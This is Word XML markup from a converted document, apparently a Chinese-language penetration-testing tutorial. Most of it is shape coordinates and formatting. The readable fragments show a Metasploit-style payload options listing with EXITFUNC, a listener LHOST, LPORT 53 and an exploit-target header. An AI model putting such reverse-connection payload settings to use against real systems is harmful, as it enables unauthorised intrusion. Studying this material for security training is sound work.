2545,5046,2545,5045,2545,5044,2545,5043,2545,5041,2545,5040,2545,5039,2545,5037,2545,5035,2545,5034,2545,5032,2545,5030,2545,5029,2545,5027,2545,5025,2545,5023,2545,5021,2545,5019,2545,5017,2545,5015,2545,5012,2545,5010,2545,5008,2545,5005,2545,5003,2545,5000,2545,4997,2545,4995,2545,4992,2545,4989,2545,4986,2545,4983,2545,4980,2545,4977,2545,4974,2545,4970,2545,4967,2545,4963,2545,4960,2545,4956,2545,4952,2545,4949,2545,4945,2545,4941,2545,4937,2545,4933,2545,4928,2545,4924,2545,4920,2545,4915,2545,4911,2545,4906,2545,4901,2545,4896,2545,4891,2545,4886,2545,4881,2545,4876,2545,4870,2545,4865,2545,4859,2545,4854,2545,4848,2545,4842,2545,4836,2545,4830,2545,4824,2545,4818,2545,4811e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:239.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,4790" coordsize="250,270">
        <v:shape style="position:absolute;left:2770;top:4790;width:250;height:270" coordorigin="2770,4790" coordsize="250,270" path="m2785,4811l2785,4811,2785,4811,2785,4811,2785,4811,2785,4811,2785,4811,2785,4811,2785,4811,2785,4811,2786,4811,2786,4811,2786,4811,2786,4811,2786,4811,2786,4811,2786,4811,2786,4811,2786,4811,2786,4811,2786,4811,2787,4811,2787,4811,2787,4811,2787,4811,2787,4811,2788,4811,2788,4811,2788,4811,2789,4811,2789,4811,2789,4811,2790,4811,2790,4811,2791,4811,2791,4811,2792,4811,2792,4811,2793,4811,2793,4811,2794,4811,2795,4811,2795,4811,2796,4811,2797,4811,2798,4811,2798,4811,2799,4811,2800,4811,2801,4811,2802,4811,2803,4811,2804,4811,2805,4811,2807,4811,2808,4811,2809,4811,2810,4811,2812,4811,2813,4811,2815,4811,2816,4811,2818,4811,2819,4811,2821,4811,2823,4811,2825,4811,2826,4811,2828,4811,2830,4811,2832,4811,2834,4811,2836,4811,2839,4811,2841,4811,2843,4811,2846,4811,2848,4811,2850,4811,2853,4811,2856,4811,2858,4811,2861,4811,2864,4811,2867,4811,2870,4811,2873,4811,2876,4811,2879,4811,2883,4811,2886,4811,2889,4811,2893,4811,2896,4811,2900,4811,2904,4811,2908,4811,2911,4811,2915,4811,2920,4811,2924,4811,2928,4811,2932,4811,2937,4811,2941,4811,2946,4811,2950,4811,2955,4811,2960,4811,2965,4811,2970,4811,2975,4811,2980,4811,2986,4811,2991,4811,2997,4811,3002,4811,3008,4811,3014,4811,3020,4811,3026,4811,3026,4811,3026,4811,3026,4811,3026,4811,3026,4811,3026,4811,3026,4811,3026,4811,3026,4812,3026,4812,3026,4812,3026,4812,3026,4812,3026,4812,3026,4812,3026,4812,3026,4812,3026,4812,3026,4812,3026,4812,3026,4813,3026,4813,3026,4813,3026,4813,3026,4814,3026,4814,3026,4814,3026,4814,3026,4815,3026,4815,3026,4816,3026,4816,3026,4816,3026,4817,3026,4817,3026,4818,3026,4818,3026,4819,3026,4820,3026,4820,3026,4821,3026,4822,3026,4823,3026,4823,3026,4824,3026,4825,3026,4826,3026,4827,3026,4828,3026,4829,3026,4830,3026,4832,3026,4833,3026,4834,3026,4835,3026,4837,3026,4838,3026,4839,3026,4841,3026,4843,3026,4844,3026,4846,3026,4848,3026,4849,3026,4851,3026,4853,3026,4855,3026,4857,3026,4859,3026,4861,3026,4863,3026,4866,3026,4868,3026,4870,3026,4873,3026,4875,3026,4878,3026,4881,3026,4883,3026,4886,3026,4889,3026,4892,3026,4895,3026,4898,3026,4901,3026,4904,3026,4908,3026,4911,3026,4915,3026,4918,3026,4922,3026,4926,3026,4929,3026,4933,3026,4937,3026,4941,3026,4945,3026,4950,3026,4954,3026,4958,3026,4963,3026,4967,3026,4972,3026,4977,3026,4982,3026,4987,3026,4992,3026,4997,3026,5002,3026,5007,3026,5013,3026,5018,3026,5024,3026,5030,3026,5036,3026,5042,3026,5048,3026,5054,3026,5060,3026,5067,3026,5067,3026,5067,3026,5067,3026,5067,3026,5067,3026,5067,3025,5067,3025,5067,3025,5067,3025,5067,3025,5067,3025,5067,3025,5067,3025,5067,3025,5067,3025,5067,3025,5067,3025,5067,3025,5067,3025,5067,3024,5067,3024,5067,3024,5067,3024,5067,3024,5067,3023,5067,3023,5067,3023,5067,3022,5067,3022,5067,3022,5067,3021,5067,3021,5067,3020,5067,3020,5067,3019,5067,3019,5067,3018,5067,3018,5067,3017,5067,3016,5067,3016,5067,3015,5067,3014,5067,3013,5067,3013,5067,3012,5067,3011,5067,3010,5067,3009,5067,3008,5067,3007,5067,3005,5067,3004,5067,3003,5067,3002,5067,3000,5067,2999,5067,2998,5067,2996,5067,2995,5067,2993,5067,2992,5067,2990,5067,2988,5067,2986,5067,2985,5067,2983,5067,2981,5067,2979,5067,2977,5067,2975,5067,2972,5067,2970,5067,2968,5067,2965,5067,2963,5067,2960,5067,2958,5067,2955,5067,2953,5067,2950,5067,2947,5067,2944,5067,2941,5067,2938,5067,2935,5067,2932,5067,2928,5067,2925,5067,2922,5067,2918,5067,2915,5067,2911,5067,2907,5067,2903,5067,2899,5067,2895,5067,2891,5067,2887,5067,2883,5067,2879,5067,2874,5067,2870,5067,2865,5067,2861,5067,2856,5067,2851,5067,2846,5067,2841,5067,2836,5067,2831,5067,2825,5067,2820,5067,2814,5067,2809,5067,2803,5067,2797,5067,2791,5067,2785,5067,2785,5067,2785,5067,2785,5067,2785,5067,2785,5067,2785,5067,2785,5067,2785,5066,2785,5066,2785,5066,2785,5066,2785,5066,2785,5066,2785,5066,2785,5066,2785,5066,2785,5066,2785,5066,2785,5066,2785,5066,2785,5065,2785,5065,2785,5065,2785,5065,2785,5064,2785,5064,2785,5064,2785,5064,2785,5063,2785,5063,2785,5062,2785,5062,2785,5062,2785,5061,2785,5061,2785,5060,2785,5059,2785,5059,2785,5058,2785,5058,2785,5057,2785,5056,2785,5055,2785,5055,2785,5054,2785,5053,2785,5052,2785,5051,2785,5050,2785,5049,2785,5048,2785,5046,2785,5045,2785,5044,2785,5043,2785,5041,2785,5040,2785,5039,2785,5037,2785,5035,2785,5034,2785,5032,2785,5030,2785,5029,2785,5027,2785,5025,2785,5023,2785,5021,2785,5019,2785,5017,2785,5015,2785,5012,2785,5010,2785,5008,2785,5005,2785,5003,2785,5000,2785,4997,2785,4995,2785,4992,2785,4989,2785,4986,2785,4983,2785,4980,2785,4977,2785,4974,2785,4970,2785,4967,2785,4963,2785,4960,2785,4956,2785,4952,2785,4949,2785,4945,2785,4941,2785,4937,2785,4933,2785,4928,2785,4924,2785,4920,2785,4915,2785,4911,2785,4906,2785,4901,2785,4896,2785,4891,2785,4886,2785,4881,2785,4876,2785,4870,2785,4865,2785,4859,2785,4854,2785,4848,2785,4842,2785,4836,2785,4830,2785,4824,2785,4818,2785,4811e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:204.500pt;margin-top:310.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4090,6210" coordsize="130,250">
        <v:shape style="position:absolute;left:4090;top:6210;width:130;height:250" coordorigin="4090,6210" coordsize="130,250" path="m4106,6222l4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4106,6222,4107,6222,4107,6222,4107,6222,4107,6222,4107,6222,4107,6222,4107,6222,4107,6222,4107,6222,4108,6222,4108,6222,4108,6222,4108,6222,4108,6222,4109,6222,4109,6222,4109,6222,4109,6222,4110,6222,4110,6222,4110,6222,4111,6222,4111,6222,4111,6222,4112,6222,4112,6222,4113,6222,4113,6222,4113,6222,4114,6222,4114,6222,4115,6222,4116,6222,4116,6222,4117,6222,4117,6222,4118,6222,4119,6222,4119,6222,4120,6222,4121,6222,4121,6222,4122,6222,4123,6222,4124,6222,4125,6222,4126,6222,4127,6222,4127,6222,4128,6222,4129,6222,4131,6222,4132,6222,4133,6222,4134,6222,4135,6222,4136,6222,4137,6222,4139,6222,4140,6222,4141,6222,4143,6222,4144,6222,4145,6222,4147,6222,4148,6222,4150,6222,4151,6222,4153,6222,4155,6222,4156,6222,4158,6222,4160,6222,4162,6222,4163,6222,4165,6222,4167,6222,4169,6222,4171,6222,4173,6222,4175,6222,4177,6222,4179,6222,4182,6222,4184,6222,4186,6222,4189,6222,4191,6222,4193,6222,4196,6222,4198,6222,4201,6222,4204,6222,4206,6222,4209,6222,4212,6222,4214,6222,4217,6222,4220,6222,4223,6222,4226,6222,4226,6222,4226,6222,4226,6222,4226,6222,4226,6222,4226,6222,4226,6222,4226,6222,4226,6222,4226,6222,4226,6222,4226,6222,4226,6222,4226,6222,4226,6223,4226,6223,4226,6223,4226,6223,4226,6223,4226,6223,4226,6223,4226,6224,4226,6224,4226,6224,4226,6224,4226,6224,4226,6225,4226,6225,4226,6225,4226,6226,4226,6226,4226,6227,4226,6227,4226,6228,4226,6228,4226,6229,4226,6229,4226,6230,4226,6230,4226,6231,4226,6232,4226,6233,4226,6233,4226,6234,4226,6235,4226,6236,4226,6237,4226,6238,4226,6239,4226,6240,4226,6241,4226,6242,4226,6243,4226,6245,4226,6246,4226,6247,4226,6249,4226,6250,4226,6252,4226,6253,4226,6255,4226,6256,4226,6258,4226,6260,4226,6262,4226,6264,4226,6266,4226,6268,4226,6270,4226,6272,4226,6274,4226,6276,4226,6279,4226,6281,4226,6283,4226,6286,4226,6289,4226,6291,4226,6294,4226,6297,4226,6300,4226,6303,4226,6306,4226,6309,4226,6312,4226,6315,4226,6318,4226,6322,4226,6325,4226,6329,4226,6333,4226,6336,4226,6340,4226,6344,4226,6348,4226,6352,4226,6356,4226,6360,4226,6365,4226,6369,4226,6374,4226,6378,4226,6383,4226,6388,4226,6392,4226,6397,4226,6402,4226,6408,4226,6413,4226,6418,4226,6424,4226,6429,4226,6435,4226,6441,4226,6446,4226,6452,4226,6458,4226,6465,4226,6471,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4226,6477,4225,6477,4225,6477,4225,6477,4225,6477,4225,6477,4225,6477,4225,6477,4225,6477,4224,6477,4224,6477,4224,6477,4224,6477,4224,6477,4223,6477,4223,6477,4223,6477,4223,6477,4222,6477,4222,6477,4222,6477,4221,6477,4221,6477,4220,6477,4220,6477,4220,6477,4219,6477,4219,6477,4218,6477,4218,6477,4217,6477,4217,6477,4216,6477,4216,6477,4215,6477,4214,6477,4214,6477,4213,6477,4212,6477,4211,6477,4211,6477,4210,6477,4209,6477,4208,6477,4207,6477,4207,6477,4206,6477,4205,6477,4204,6477,4203,6477,4202,6477,4201,6477,4200,6477,4198,6477,4197,6477,4196,6477,4195,6477,4194,6477,4192,6477,4191,6477,4190,6477,4188,6477,4187,6477,4185,6477,4184,6477,4182,6477,4181,6477,4179,6477,4178,6477,4176,6477,4174,6477,4172,6477,4171,6477,4169,6477,4167,6477,4165,6477,4163,6477,4161,6477,4159,6477,4157,6477,4155,6477,4153,6477,4151,6477,4148,6477,4146,6477,4144,6477,4141,6477,4139,6477,4136,6477,4134,6477,4131,6477,4129,6477,4126,6477,4123,6477,4121,6477,4118,6477,4115,6477,4112,6477,4109,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6477,4106,6476,4106,6476,4106,6476,4106,6476,4106,6476,4106,6475,4106,6475,4106,6475,4106,6475,4106,6474,4106,6474,4106,6474,4106,6473,4106,6473,4106,6472,4106,6472,4106,6471,4106,6471,4106,6470,4106,6470,4106,6469,4106,6468,4106,6468,4106,6467,4106,6466,4106,6465,4106,6464,4106,6463,4106,6463,4106,6462,4106,6461,4106,6459,4106,6458,4106,6457,4106,6456,4106,6455,4106,6453,4106,6452,4106,6451,4106,6449,4106,6448,4106,6446,4106,6445,4106,6443,4106,6441,4106,6439,4106,6438,4106,6436,4106,6434,4106,6432,4106,6430,4106,6428,4106,6425,4106,6423,4106,6421,4106,6418,4106,6416,4106,6413,4106,6411,4106,6408,4106,6405,4106,6403,4106,6400,4106,6397,4106,6394,4106,6391,4106,6388,4106,6384,4106,6381,4106,6378,4106,6374,4106,6371,4106,6367,4106,6363,4106,6359,4106,6355,4106,6352,4106,6347,4106,6343,4106,6339,4106,6335,4106,6330,4106,6326,4106,6321,4106,6317,4106,6312,4106,6307,4106,6302,4106,6297,4106,6292,4106,6287,4106,6281,4106,6276,4106,6270,4106,6265,4106,6259,4106,6253,4106,6247,4106,6241,4106,6235,4106,6229,4106,6222e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:264.500pt;margin-top:310.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5290,6210" coordsize="130,250">
        <v:shape style="position:absolute;left:5290;top:6210;width:130;height:250" coordorigin="5290,6210" coordsize="130,250" path="m5307,6222l5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5307,6222,5308,6222,5308,6222,5308,6222,5308,6222,5308,6222,5308,6222,5308,6222,5309,6222,5309,6222,5309,6222,5309,6222,5309,6222,5310,6222,5310,6222,5310,6222,5311,6222,5311,6222,5311,6222,5312,6222,5312,6222,5312,6222,5313,6222,5313,6222,5314,6222,5314,6222,5315,6222,5315,6222,5316,6222,5316,6222,5317,6222,5317,6222,5318,6222,5319,6222,5319,6222,5320,6222,5321,6222,5321,6222,5322,6222,5323,6222,5324,6222,5324,6222,5325,6222,5326,6222,5327,6222,5328,6222,5329,6222,5330,6222,5331,6222,5332,6222,5333,6222,5334,6222,5336,6222,5337,6222,5338,6222,5339,6222,5340,6222,5342,6222,5343,6222,5345,6222,5346,6222,5347,6222,5349,6222,5350,6222,5352,6222,5354,6222,5355,6222,5357,6222,5359,6222,5360,6222,5362,6222,5364,6222,5366,6222,5368,6222,5370,6222,5372,6222,5374,6222,5376,6222,5378,6222,5380,6222,5382,6222,5385,6222,5387,6222,5389,6222,5392,6222,5394,6222,5396,6222,5399,6222,5402,6222,5404,6222,5407,6222,5409,6222,5412,6222,5415,6222,5418,6222,5421,6222,5424,6222,5427,6222,5427,6222,5427,6222,5427,6222,5427,6222,5427,6222,5427,6222,5427,6222,5427,6222,5427,6222,5427,6222,5427,6222,5427,6222,5427,6222,5427,6222,5427,6223,5427,6223,5427,6223,5427,6223,5427,6223,5427,6223,5427,6223,5427,6224,5427,6224,5427,6224,5427,6224,5427,6224,5427,6225,5427,6225,5427,6225,5427,6226,5427,6226,5427,6227,5427,6227,5427,6228,5427,6228,5427,6229,5427,6229,5427,6230,5427,6230,5427,6231,5427,6232,5427,6233,5427,6233,5427,6234,5427,6235,5427,6236,5427,6237,5427,6238,5427,6239,5427,6240,5427,6241,5427,6242,5427,6243,5427,6245,5427,6246,5427,6247,5427,6249,5427,6250,5427,6252,5427,6253,5427,6255,5427,6256,5427,6258,5427,6260,5427,6262,5427,6264,5427,6266,5427,6268,5427,6270,5427,6272,5427,6274,5427,6276,5427,6279,5427,6281,5427,6283,5427,6286,5427,6289,5427,6291,5427,6294,5427,6297,5427,6300,5427,6303,5427,6306,5427,6309,5427,6312,5427,6315,5427,6318,5427,6322,5427,6325,5427,6329,5427,6333,5427,6336,5427,6340,5427,6344,5427,6348,5427,6352,5427,6356,5427,6360,5427,6365,5427,6369,5427,6374,5427,6378,5427,6383,5427,6388,5427,6392,5427,6397,5427,6402,5427,6408,5427,6413,5427,6418,5427,6424,5427,6429,5427,6435,5427,6441,5427,6446,5427,6452,5427,6458,5427,6465,5427,6471,5427,6477,5427,6477,5427,6477,5427,6477,5427,6477,5427,6477,5427,6477,5427,6477,5427,6477,5427,6477,5427,6477,5427,6477,5427,6477,5427,6477,5427,6477,5427,6477,5426,6477,5426,6477,5426,6477,5426,6477,5426,6477,5426,6477,5426,6477,5426,6477,5426,6477,5426,6477,5426,6477,5425,6477,5425,6477,5425,6477,5425,6477,5425,6477,5425,6477,5424,6477,5424,6477,5424,6477,5424,6477,5423,6477,5423,6477,5423,6477,5423,6477,5422,6477,5422,6477,5421,6477,5421,6477,5421,6477,5420,6477,5420,6477,5419,6477,5419,6477,5418,6477,5418,6477,5417,6477,5417,6477,5416,6477,5416,6477,5415,6477,5414,6477,5414,6477,5413,6477,5412,6477,5411,6477,5411,6477,5410,6477,5409,6477,5408,6477,5407,6477,5406,6477,5405,6477,5404,6477,5403,6477,5402,6477,5401,6477,5400,6477,5399,6477,5398,6477,5397,6477,5395,6477,5394,6477,5393,6477,5392,6477,5390,6477,5389,6477,5387,6477,5386,6477,5385,6477,5383,6477,5381,6477,5380,6477,5378,6477,5377,6477,5375,6477,5373,6477,5371,6477,5369,6477,5368,6477,5366,6477,5364,6477,5362,6477,5360,6477,5358,6477,5355,6477,5353,6477,5351,6477,5349,6477,5347,6477,5344,6477,5342,6477,5339,6477,5337,6477,5334,6477,5332,6477,5329,6477,5327,6477,5324,6477,5321,6477,5318,6477,5316,6477,5313,6477,5310,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6477,5307,6476,5307,6476,5307,6476,5307,6476,5307,6476,5307,6475,5307,6475,5307,6475,5307,6475,5307,6474,5307,6474,5307,6474,5307,6473,5307,6473,5307,6472,5307,6472,5307,6471,5307,6471,5307,6470,5307,6470,5307,6469,5307,6468,5307,6468,5307,6467,5307,6466,5307,6465,5307,6464,5307,6463,5307,6463,5307,6462,5307,6461,5307,6459,5307,6458,5307,6457,5307,6456,5307,6455,5307,6453,5307,6452,5307,6451,5307,6449,5307,6448,5307,6446,5307,6445,5307,6443,5307,6441,5307,6439,5307,6438,5307,6436,5307,6434,5307,6432,5307,6430,5307,6428,5307,6425,5307,6423,5307,6421,5307,6418,5307,6416,5307,6413,5307,6411,5307,6408,5307,6405,5307,6403,5307,6400,5307,6397,5307,6394,5307,6391,5307,6388,5307,6384,5307,6381,5307,6378,5307,6374,5307,6371,5307,6367,5307,6363,5307,6359,5307,6355,5307,6352,5307,6347,5307,6343,5307,6339,5307,6335,5307,6330,5307,6326,5307,6321,5307,6317,5307,6312,5307,6307,5307,6302,5307,6297,5307,6292,5307,6287,5307,6281,5307,6276,5307,6270,5307,6265,5307,6259,5307,6253,5307,6247,5307,6241,5307,6235,5307,6229,5307,6222e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:345.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,6910" coordsize="130,270">
        <v:shape style="position:absolute;left:2170;top:6910;width:130;height:270" coordorigin="2170,6910" coordsize="130,270" path="m2185,6927l2185,6927,2185,6927,2185,6927,2185,6927,2185,6927,2185,6927,2185,6927,2185,6927,2185,6927,2185,6927,2185,6927,2185,6927,2185,6927,2185,6927,2185,6927,2185,6927,2185,6927,2185,6927,2186,6927,2186,6927,2186,6927,2186,6927,2186,6927,2186,6927,2186,6927,2186,6927,2186,6927,2187,6927,2187,6927,2187,6927,2187,6927,2187,6927,2187,6927,2188,6927,2188,6927,2188,6927,2188,6927,2189,6927,2189,6927,2189,6927,2190,6927,2190,6927,2190,6927,2191,6927,2191,6927,2192,6927,2192,6927,2192,6927,2193,6927,2193,6927,2194,6927,2195,6927,2195,6927,2196,6927,2196,6927,2197,6927,2198,6927,2198,6927,2199,6927,2200,6927,2200,6927,2201,6927,2202,6927,2203,6927,2204,6927,2205,6927,2206,6927,2207,6927,2208,6927,2209,6927,2210,6927,2211,6927,2212,6927,2213,6927,2214,6927,2215,6927,2216,6927,2218,6927,2219,6927,2220,6927,2222,6927,2223,6927,2224,6927,2226,6927,2227,6927,2229,6927,2230,6927,2232,6927,2234,6927,2235,6927,2237,6927,2239,6927,2241,6927,2242,6927,2244,6927,2246,6927,2248,6927,2250,6927,2252,6927,2254,6927,2256,6927,2259,6927,2261,6927,2263,6927,2265,6927,2268,6927,2270,6927,2272,6927,2275,6927,2277,6927,2280,6927,2283,6927,2285,6927,2288,6927,2291,6927,2293,6927,2296,6927,2299,6927,2302,6927,2305,6927,2305,6927,2305,6927,2305,6927,2305,6927,2305,6927,2305,6928,2305,6928,2305,6928,2305,6928,2305,6928,2305,6928,2305,6928,2305,6928,2305,6928,2305,6928,2305,6928,2305,6928,2305,6928,2305,6928,2305,6929,2305,6929,2305,6929,2305,6929,2305,6929,2305,6930,2305,6930,2305,6930,2305,6930,2305,6931,2305,6931,2305,6932,2305,6932,2305,6932,2305,6933,2305,6933,2305,6934,2305,6935,2305,6935,2305,6936,2305,6936,2305,6937,2305,6938,2305,6939,2305,6940,2305,6940,2305,6941,2305,6942,2305,6943,2305,6944,2305,6945,2305,6946,2305,6948,2305,6949,2305,6950,2305,6951,2305,6953,2305,6954,2305,6956,2305,6957,2305,6959,2305,6960,2305,6962,2305,6964,2305,6965,2305,6967,2305,6969,2305,6971,2305,6973,2305,6975,2305,6977,2305,6979,2305,6982,2305,6984,2305,6986,2305,6989,2305,6991,2305,6994,2305,6997,2305,6999,2305,7002,2305,7005,2305,7008,2305,7011,2305,7014,2305,7017,2305,7020,2305,7024,2305,7027,2305,7031,2305,7034,2305,7038,2305,7042,2305,7045,2305,7049,2305,7053,2305,7057,2305,7061,2305,7066,2305,7070,2305,7074,2305,7079,2305,7083,2305,7088,2305,7093,2305,7098,2305,7103,2305,7108,2305,7113,2305,7118,2305,7124,2305,7129,2305,7135,2305,7140,2305,7146,2305,7152,2305,7158,2305,7164,2305,7170,2305,7176,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2305,7183,2304,7183,2304,7183,2304,7183,2304,7183,2304,7183,2304,7183,2304,7183,2303,7183,2303,7183,2303,7183,2303,7183,2303,7183,2302,7183,2302,7183,2302,7183,2302,7183,2301,7183,2301,7183,2301,7183,2300,7183,2300,7183,2299,7183,2299,7183,2299,7183,2298,7183,2298,7183,2297,7183,2297,7183,2296,7183,2296,7183,2295,7183,2295,7183,2294,7183,2293,7183,2293,7183,2292,7183,2291,7183,2291,7183,2290,7183,2289,7183,2288,7183,2287,7183,2286,7183,2286,7183,2285,7183,2284,7183,2283,7183,2282,7183,2281,7183,2280,7183,2279,7183,2277,7183,2276,7183,2275,7183,2274,7183,2273,7183,2271,7183,2270,7183,2269,7183,2267,7183,2266,7183,2264,7183,2263,7183,2261,7183,2260,7183,2258,7183,2257,7183,2255,7183,2253,7183,2251,7183,2250,7183,2248,7183,2246,7183,2244,7183,2242,7183,2240,7183,2238,7183,2236,7183,2234,7183,2232,7183,2230,7183,2227,7183,2225,7183,2223,7183,2220,7183,2218,7183,2215,7183,2213,7183,2210,7183,2208,7183,2205,7183,2202,7183,2200,7183,2197,7183,2194,7183,2191,7183,2188,7183,2185,7183,2185,7183,2185,7183,2185,7183,2185,7183,2185,7183,2185,7183,2185,7183,2185,7183,2185,7183,2185,7183,2185,7182,2185,7182,2185,7182,2185,7182,2185,7182,2185,7182,2185,7182,2185,7182,2185,7182,2185,7182,2185,7181,2185,7181,2185,7181,2185,7181,2185,7181,2185,7180,2185,7180,2185,7180,2185,7179,2185,7179,2185,7179,2185,7178,2185,7178,2185,7177,2185,7177,2185,7176,2185,7176,2185,7175,2185,7174,2185,7174,2185,7173,2185,7172,2185,7171,2185,7171,2185,7170,2185,7169,2185,7168,2185,7167,2185,7166,2185,7165,2185,7164,2185,7163,2185,7161,2185,7160,2185,7159,2185,7157,2185,7156,2185,7155,2185,7153,2185,7152,2185,7150,2185,7148,2185,7147,2185,7145,2185,7143,2185,7141,2185,7139,2185,7137,2185,7135,2185,7133,2185,7131,2185,7128,2185,7126,2185,7124,2185,7121,2185,7119,2185,7116,2185,7113,2185,7111,2185,7108,2185,7105,2185,7102,2185,7099,2185,7096,2185,7093,2185,7090,2185,7086,2185,7083,2185,7079,2185,7076,2185,7072,2185,7069,2185,7065,2185,7061,2185,7057,2185,7053,2185,7049,2185,7044,2185,7040,2185,7036,2185,7031,2185,7027,2185,7022,2185,7017,2185,7012,2185,7007,2185,7002,2185,6997,2185,6992,2185,6987,2185,6981,2185,6976,2185,6970,2185,6964,2185,6958,2185,6952,2185,6946,2185,6940,2185,6934,2185,6927e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:399.600pt;width:467.400pt;height:283.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10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12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‐‐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‐‐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‐‐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‐‐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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="136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13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>EXITFUNC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process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Exit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dc4867"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>technique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Accepted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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''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seh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thread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proce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ss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3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none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)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14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980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LHOST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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.4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listen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dc4867"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>address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an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interface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may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be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specifi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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="6261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15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LPORT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53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1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listen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port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16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="25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17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7942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18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Exploit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target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19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20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="13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Id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Name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21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t>   </w:t>
